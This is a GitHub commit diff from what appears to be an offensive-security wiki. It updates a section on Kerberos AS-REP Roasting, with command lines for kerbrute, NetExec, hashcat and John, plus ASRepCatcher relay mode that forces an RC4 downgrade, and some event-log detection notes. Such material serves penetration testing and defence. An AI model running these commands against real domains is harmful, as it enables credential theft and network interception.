You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
> AS-REP Roasting with Rubeus will generate a 4768 with an encryption type of 0x17 and preauth type of 0.
42
+
> Rubeus requests **RC4** by default, so Event ID **4768** usually shows **preauth type 0**and **ticket encryption type 0x17**. If you add **`/aes`** (or RC4 is disabled for the target), expect **AES etypes** instead.
41
43
42
44
#### Quick one-liners (Linux)
43
45
44
46
- Enumerate potential targets first (e.g., from leaked build paths) with Kerberos userenum: `kerbrute userenum users.txt -d domain --dc dc.domain`
45
-
- Pull a single user’s AS-REP even with a **blank** password using `netexec ldap <dc> -u svc_scan -p '' --asreproast out.asreproast` (netexec also prints LDAP signing/channel binding posture).
46
-
- Crack with `hashcat out.asreproast /path/rockyou.txt` – it auto-detects **-m 18200** (etype 23) for AS-REP roast hashes.
47
+
- Roast a whole username list without valid creds using NetExec: `netexec ldap <dc> -u users.txt -p '' --asreproast out.asreproast`
48
+
- If you do have creds, let NetExec query LDAP and request every roastable account for you: `netexec ldap <dc> -u <user> -p '<pass>' --asreproast out.asreproast [--kdcHost <dc_fqdn>]`
49
+
- If the output starts with **`$krb5asrep$23$`**, crack it with Hashcat **`-m 18200`**. If it starts with **`$krb5asrep$17$`** or **`$krb5asrep$18$`**, prefer John **`--format=krb5asrep`**.
47
50
48
51
### Cracking
49
52
53
+
Don't assume every AS-REP roast is RC4. Modern tooling can return **RC4** (`$krb5asrep$23$`) or **AES** (`$krb5asrep$17$` / `$krb5asrep$18$`) depending on the requested/negotiated enctype. **`hashcat -m 18200`** is for **etype 23**, while **John** handles `krb5asrep` directly for **17/18/23**.
54
+
50
55
```bash
51
-
john --wordlist=passwords_kerb.txt hashes.asreproast
52
-
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
56
+
john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast
An attacker can use a man-in-the-middle position to capture AS-REP packets as they traverse the network without relying on Kerberos pre-authentication being disabled. It therefore works for all users on the VLAN.\
70
-
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) allows us to do so. Moreover, the tool forces client workstations to use RC4 by altering the Kerberos negotiation.
79
+
If you want the related no-credential trick that returns a **service ticket** instead of a **TGT** from a no-preauth principal, see [Kerberoast](kerberoast.md).
80
+
81
+
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) allows us to do so. `relay` mode is the interesting one offensively because it can force **RC4** when the client still advertises **etype 23**; `listen` stays passive and just captures whatever the client/DC negotiated.
71
82
72
83
```bash
73
84
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
0 commit comments